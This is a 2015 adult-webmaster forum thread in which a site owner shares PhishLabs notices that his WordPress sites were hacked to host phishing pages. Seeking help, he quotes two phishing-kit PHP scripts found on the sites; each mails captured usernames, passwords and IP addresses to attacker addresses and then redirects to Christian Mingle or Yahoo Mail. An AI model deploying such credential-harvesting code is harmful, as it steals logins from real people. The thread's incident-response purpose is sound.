GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Phishlabs? Who are they? (https://gfy.com/showthread.php?t=1172666)

hausarzt 08-24-2015 01:49 AM
Phishlabs? Who are they?
 
I receive strange emails in the past for almost every of my sites:

Quote:
Our company investigates computer crime incidents on behalf of banks and other companies.

We have discovered that your web site, hottiescam.com, has been attacked by criminals. These criminals created a fake web page which appears to copy a Spark Networks site.


http:// my website .com/services/mchsvjbsuvkjn.html



If possible, please provide the following information to assist our investigation:

- Web server and FTP server log files for the past several days
- Copies of all phishing files, hack tools, or other hacker files

Finally, we kindly request that you disable or remove the phishing files as soon as possible.

We recommend taking the following actions to secure the web site and prevent the attackers from returning:

- Change your web hosting password
- Update your web applications including CMS, blog, ecommerce, and other applications (and all add-on modules/components/plugins)
- Search all of your web directories for suspicious files and investigate any found
- Scan the computer from which you login to your web hosting control panel or ftp server with anti-virus software

If you believe we have contacted you in error, or if we can provide any assistance with this incident, please contact us and let us know.

Thank you for your assistance with this matter,

Eric George
PhishLabs Security Operations
[email protected]
+1.202.386.6001
http://www.phishlabs.com


Another one through my abuse contact from my hosting:

Quote:
Our company investigates computer crime incidents on behalf of banks and other companies.

We have discovered that your web site, www.dirtycamsluts.com, has been attacked by criminals. These criminals created a fake web page which appears to copy a Spark Networks site.


hXXp www [dot] MY WEBSITE [dot] com/jimjim/mchsvjbsuvkjn [dot] html
hXXp www [dot] MY WEBSITE [dot] com/jimjim/login [dot] php



If possible, please provide the following information to assist our investigation:

- Web server and FTP server log files for the past several days
- Copies of all phishing files, hack tools, or other hacker files

Finally, we kindly request that you disable or remove the phishing files as soon as possible.

We recommend taking the following actions to secure the web site and prevent the attackers from returning:

- Change your web hosting password
- Update your web applications including CMS, blog, ecommerce, and other applications (and all add-on modules/components/plugins)
- Search all of your web directories for suspicious files and investigate any found
- Scan the computer from which you login to your web hosting control panel or ftp server with anti-virus software

If you believe we have contacted you in error, or if we can provide any assistance with this incident, please contact us and let us know.

Thank you for your assistance with this matter,

Matt Twitty
PhishLabs Security Operations
[email protected]
+1.202.386.6001
http://www.phishlabs.com
Sites are running on wordpress. I just checked the sites and found some strange folders in some installs, so I deleted them. Anyone else has this "problem"?

j3rkules 08-24-2015 01:56 AM
Never heard of them.

hausarzt 08-24-2015 03:18 AM
Alright, now google webmaster tool told me, that my sites are reported as phising sites.

I removed all suspicious files/folder from my sites.


A file called buff.php contained this:

http://pastebin.com/jJ3QS7UH
:warning READ AT YOUR OWN RISK :warning

My Avast goes wild on this file. Can anyone read/translate this?

Some fake-login php-files:

Quote:
<?php
$ip = getenv("REMOTE_ADDR");
$data=date("D M d, Y g:i a");
$message .= "User: ".$_POST['loginemail']."\n";
$message .= "PassWord: " .$_POST['password']."\n";
$message .= "Country: $ip\n";
$message .= "Date: $data\n";

$recipient = "[email protected]";
$subject = "Christian Mingle | $ip";
$headers = "From: Rashyd Bohaty <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);

header("Location: http://www.christianmingle.com/");
?>
Quote:
<?php
$ip = getenv("REMOTE_ADDR");

$data=date("D M d, Y g:i a");
$message .= "====== Hacked By OBO ======\n";
$message .= "User: ".$_POST['username']."\n";
$message .= "PassWord: " .$_POST['passwd']."\n";
$message .= "Country: $ip\n";
$message .= "Date: $data\n";
$message .= "====== ® Trademark 2015 ======\n";

$recipient = "[email protected]";
$recipient2 = "[email protected]";
$subject = "Y!Logs $ip";
$headers = "From: Rashyd Bohaty <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
mail($recipient2,$subject,$message,$headers);
header("Location: http://www.yahoomail.com");

?>

MrGusMuller 08-24-2015 04:35 AM
it was sending the user/password to the hackers' email :/
change them all!!

MrGusMuller 08-24-2015 04:38 AM
try Sucuri Security ? WAF, DDoS Protection, Malware Removal, WordPress Security, and Blacklist Removal
they have helped some friends...


All times are GMT -7. The time now is 03:25 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc